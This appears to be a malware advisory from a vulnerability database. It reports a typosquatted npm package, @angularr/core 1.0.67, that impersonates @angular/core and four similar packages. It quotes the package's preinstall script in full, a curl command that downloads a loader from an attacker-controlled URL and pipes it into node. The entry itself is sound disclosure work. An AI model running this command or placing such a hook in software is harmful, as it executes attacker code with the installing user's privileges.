Vulnerability MAL-2026-17493
Unknown
UNKNOWN RISK
Vulnerabilities without an assigned CVSS score. Severity is not determinable from available data.
2 days ago
October 03, 2026 at 06:34 AM UTC
Malicious code in @angularr/core (npm)
1.0.67
1.0.67
Summary
Malicious code in @angularr/core (npm)
Details
@angularr/[email protected] impersonates @angular/core (by name only; its code is an unrelated library described as "Core Libs") and adds a preinstall script that runs on npm install and pipes a remotely hosted loader into node: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. This runs attacker-controlled JavaScript with the installing user's privileges. The npm account angularr published @angularr/core and 5 similar packages on 2026-10-03 between 06:33 and 07:23 UTC, all with the same preinstall script.
References
Impacted packages
Timeline
Published
2 days ago
October 03, 2026 at 06:34 AM UTC
Last Modified
1 hour ago
October 05, 2026 at 11:00 PM UTC